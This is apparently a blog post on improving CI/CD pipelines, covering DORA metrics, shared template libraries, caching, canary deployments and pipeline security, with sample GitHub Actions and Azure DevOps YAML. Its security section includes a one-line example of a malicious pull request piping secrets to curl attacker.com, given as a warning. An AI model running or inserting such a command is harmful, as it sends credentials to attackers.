π¬ Welcome to Pipeline Therapy
Let me describe your CI/CD pipeline. Stop me when I'm wrong:
- It takes 42 minutes to build and deploy
- Nobody knows exactly what it does (the YAML is 800 lines)
- Each team has their own custom pipeline because "our needs are different"
- Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
- There's a manual approval step where someone clicks "Approve" without looking
- Someone set it up 3 years ago and that person doesn't work here anymore
Was I close? π
Let's fix all of this.
π DORA Metrics: How to Know If You're Actually Good
Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:
Metric β Elite β "We Need Help"
ββββββββββββββββββββββββββΌβββββββββββββββββΌββββββββββββββββββ
Deployment Frequency β Multiple/day β Monthly or less
Lead Time for Changes β < 1 hour β > 1 month
Change Failure Rate β 0-15% β > 45%
Mean Time to Recovery β < 1 hour β > 6 months
Here's the Uncomfortable Truth
If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% β you are statistically average. Not bad, but not good either.
Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter β they have better pipelines, smaller changes, and more automation.
How to Track DORA Now
# GitHub Actions: Track deployment frequency
- name: Record deployment
run: |
curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
-H "Content-Type: application/json" \
-d '{
"event": "deployment",
"service": "${{ github.repository }}",
"environment": "production",
"sha": "${{ github.sha }}",
"timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
}'
Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).
ποΈ Pipeline Architecture: The Template Library Pattern
The Anti-Pattern: Every Team Reinvents the Wheel
Team Alpha: 800-line custom YAML β Azure DevOps
Team Bravo: 600-line custom YAML β Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" β π±
Result:
β’ 3 different security scanning approaches
β’ 2 teams forgot to add container image scanning
β’ 1 team has no tests in their pipeline
β’ Nobody can help debug another team's pipeline
The Solution: Shared Template Library
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Shared Template Library (v2.5.0) β
β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Build β β Test β β Security β β
β β Template β β Template β β Scan β β
β β (.NET, β β (unit, β β Template β β
β β Node, β β integ, β β (Trivy, β β
β β Python) β β e2e) β β Checkov) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Deploy β β Notify β β Rollback β β
β β Template β β Template β β Template β β
β β (K8s, β β (Slack, β β (auto/ β β
β β AppSvc) β β Teams) β β manual) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
β consumed by
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββ
β Team pipelines (10-20 lines each!) β
β "Use build template, test template, deploy β
β template β just tell it your service name" β
βββββββββββββββββββββββββββββββββββββββββββββββββββ
Azure DevOps: Template Library in Action
# Team's pipeline: SHORT and STANDARD
trigger:
branches:
include: [main]
resources:
repositories:
- repository: templates
type: git
name: platform/pipeline-templates
ref: refs/tags/v2.5.0 # π Always pin the version!
stages:
- template: stages/ci.yml@templates
parameters:
language: dotnet
dotnetVersion: '8.0'
testProjects: '**/*Tests.csproj'
- template: stages/security-scan.yml@templates
parameters:
trivySeverity: 'CRITICAL,HIGH'
- template: stages/deploy-k8s.yml@templates
parameters:
environment: staging
aksCluster: aks-staging-eastus
namespace: payments
- template: stages/deploy-k8s.yml@templates
parameters:
environment: production
aksCluster: aks-prod-eastus
namespace: payments
requireApproval: true
GitHub Actions: Reusable Workflows
# .github/workflows/deploy.yml β Team's workflow
name: Deploy
on:
push:
branches: [main]
jobs:
build-and-test:
uses: myorg/shared-workflows/.github/workflows/build-dotnet.yml@v2.5.0
with:
dotnet-version: '8.0'
project-path: 'src/PaymentService'
security-scan:
needs: build-and-test
uses: myorg/shared-workflows/.github/workflows/security-scan.yml@v2.5.0
with:
image: ${{ needs.build-and-test.outputs.image }}
deploy:
needs: [build-and-test, security-scan]
uses: myorg/shared-workflows/.github/workflows/deploy-k8s.yml@v2.5.0
with:
environment: production
image: ${{ needs.build-and-test.outputs.image }}
secrets: inherit
β‘ Pipeline Performance: From 45 Minutes to 5
Where's the Time Going?
In my experience auditing pipelines, here's where time hides:
Typical 45-minute pipeline breakdown:
βββββββββββββββββββββββββββββββββββββββββββ
7 min ββββββββ Agent startup + checkout
12 min ββββββββββββββ Dependency install (npm/nuget)
5 min βββββββ Build
8 min ββββββββββ Tests (running ALL tests sequentially)
3 min βββββ Docker build (no layer caching)
5 min βββββββ Security scanning
5 min βββββββ Deploy + smoke tests
βββββββββββββββββββββββββββββββββββββββββββ
45 min total π€
Optimized 5-minute pipeline:
βββββββββββββββββββββββββββββββββββββββββββ
0.5 min βββ Cached checkout
0.5 min βββ Cached dependencies
1 min ββββ Incremental build
1 min ββββ Parallel tests (affected only)
0.5 min βββ Docker build (cached layers)
1 min ββββ Parallel: scan + deploy
0.5 min βββ Smoke test
βββββββββββββββββββββββββββββββββββββββββββ
5 min total π
The Optimization Playbook
1. Cache Everything
# GitHub Actions: Cache node_modules
- uses: actions/cache@v4
with:
path: ~/.npm
key: npm-${{ hashFiles('**/package-lock.json') }}
restore-keys: npm-
# Azure DevOps: Cache NuGet packages
- task: Cache@2
inputs:
key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
restoreKeys: 'nuget | "$(Agent.OS)"'
path: $(NUGET_PACKAGES)
2. Docker Layer Caching
# BAD: Copying everything first breaks the cache
COPY . .
RUN npm install
# GOOD: Copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install
3. Run Tests in Parallel
# GitHub Actions: Matrix strategy
jobs:
test:
strategy:
matrix:
shard: [1, 2, 3, 4]
steps:
- run: npm test -- --shard=${{ matrix.shard }}/4
4. Only Test What Changed
# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
id: changes
with:
filters: |
payments:
- 'services/payments/**'
users:
- 'services/users/**'
- name: Test payments
if: steps.changes.outputs.payments == 'true'
run: cd services/payments && npm test
π¨ Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything
The Error:
ERROR: npm ERR! ENOSPC: no space left on device
What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams.
Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.
The Fix:
- Use ephemeral agents (fresh VM/container per build) β Azure DevOps Scale Set agents or GitHub Actions hosted runners
- If self-hosted, add a cleanup job:
- name: Agent cleanup
condition: always()
run: |
docker system prune -af --volumes
rm -rf /tmp/build-*
π’ Deployment Strategies: How to Ship Without Sinking
The Deployment Strategy Menu
Strategy β Risk β Speed β Rollback β Best For
ββββββββββββββββββββΌββββββββΌββββββββΌβββββββββββΌββββββββββββββββββ
Rolling Update β Med β Fast β Slow β Default K8s strategy
Blue-Green β Low β Fast β Instant β Stateless services
Canary β Low β Slow β Fast β High-risk changes
Feature Flags β Lowestβ Inst. β Instant β Business logic changes
Canary Deployment: The Smart Way to Ship
Step 1: Deploy new version to 5% of traffic
βββββββββββββββββββββββββββββββββββ
β 95% traffic β v1.0 (3 pods) β
β 5% traffic β v2.0 (1 pod) β β Watch error rates, latency
βββββββββββββββββββββββββββββββββββ
Step 2: If metrics look good, increase to 25%
βββββββββββββββββββββββββββββββββββ
β 75% traffic β v1.0 (3 pods) β
β 25% traffic β v2.0 (1 pod) β β Still watching...
βββββββββββββββββββββββββββββββββββ
Step 3: If still good, go to 100%
βββββββββββββββββββββββββββββββββββ
β 100% traffic β v2.0 (3 pods) β β π Full rollout
βββββββββββββββββββββββββββββββββββ
Step ABORT: If any stage looks bad
βββββββββββββββββββββββββββββββββββ
β 100% traffic β v1.0 (3 pods) β β π Safely rolled back
β 0% traffic β v2.0 (removed) β
βββββββββββββββββββββββββββββββββββ
π¨ Real-World Disaster #2: The Friday 5 PM Deployment
What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.
If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend.
The Golden Rules:
- Never deploy on Friday (unless you have canary + automated rollback)
- Never deploy during peak hours (find your low-traffic window)
- Always have automated rollback based on error rates and latency
- Small changes, frequent deploys > big changes, occasional deploys
π Pipeline Security: Your Pipeline is an Attack Vector
Your CI/CD pipeline has more access than most developers:
- It can push code to production
- It has access to secrets and credentials
- It can modify infrastructure
- It downloads code from the internet (dependencies)
Things That Should Scare You
Scary Thing #1: Secrets in pipeline logs
βββββββββββββββββββββββββββββββββββββββββββββββ
β Step: Deploy β
β $ echo $DATABASE_CONNECTION_STRING β
β Server=prod.db.windows.net;Password=Pa$$w0rdβ β π«
βββββββββββββββββββββββββββββββββββββββββββββββ
Scary Thing #2: Pull request pipelines run arbitrary code
βββββββββββββββββββββββββββββββββββββββββββββββ
β External contributor opens PR β
β PR changes build script to: β
β echo $SECRETS | curl attacker.com β
β Pipeline runs automatically... β β π±
βββββββββββββββββββββββββββββββββββββββββββββββ
Scary Thing #3: Dependency confusion attacks
βββββββββββββββββββββββββββββββββββββββββββββββ
β Internal package: @mycompany/utils β
β Attacker publishes: @mycompany/utils on npm β
β Pipeline installs public one first... β β π¦
βββββββββββββββββββββββββββββββββββββββββββββββ
Pipeline Security Checklist
Authentication:
β
OIDC federation (no long-lived secrets in pipelines)
β
Managed Identity for Azure resources
β
Short-lived tokens (expire in minutes, not months)
Authorization:
β
Pipeline can only deploy to its own service
β
Production deploys require approved PR + passing checks
β
Environment protection rules with required reviewers
Dependencies:
β
Lock files committed (package-lock.json, go.sum)
β
Dependency scanning (Dependabot, Snyk)
β
Private package registry for internal packages
Secrets:
β
Never echo/print secrets in logs
β
Use secret masking in pipeline variables
β
Rotate secrets automatically
β
Audit who accesses what secret
π¨ Real-World Disaster #3: The Secret That Wasn't Secret
What Happened: A developer added a debug step to a pipeline:
- name: Debug connection
run: |
echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.
The Fix:
- Remove all
echo/printstatements that reference secrets - Use OIDC federation so there are no secrets to leak:
# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
id-token: write
contents: read
steps:
- uses: azure/login@v2
with:
client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret!
tenant-id: ${{ vars.AZURE_TENANT_ID }}
subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
π Multi-Team Governance: Herding Cats With Guardrails
At the Principal level, you're not just building pipelines β you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:
Platform Team Provides: App Teams Customize:
ββββββββββββββββββββββββ ββββββββββββββββββββ
β
Template library β
Service name & config
β
Security scanning β
Test commands
β
Deployment strategies β
Environment-specific vars
β
Secret management pattern β
Notification channels
β
DORA metrics collection β
Deployment schedule
β
Compliance guardrails β
Custom test stages
The Inner Source Model
Template repo: platform/pipeline-templates
βββ Maintained by platform team
βββ Versioned with semantic versioning (v2.5.0)
βββ Teams consume via git tags (immutable reference)
βββ Breaking changes = major version bump
βββ Teams can contribute improvements via PR
βββ Monthly "template office hours" for questions
π― Key Takeaways
- Measure DORA metrics β you can't improve what you don't measure
- Template libraries standardize quality without removing team autonomy
- Cache everything to cut build times by 80%+
- Canary deployments are the safest way to ship to production
- OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
- Never deploy on Friday. Just don't. π
π₯ Homework
- Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
- Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
- Add caching for dependencies if you haven't already β measure the before/after build time.
Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans* β where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.*
π¬ What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. π
Top comments (0)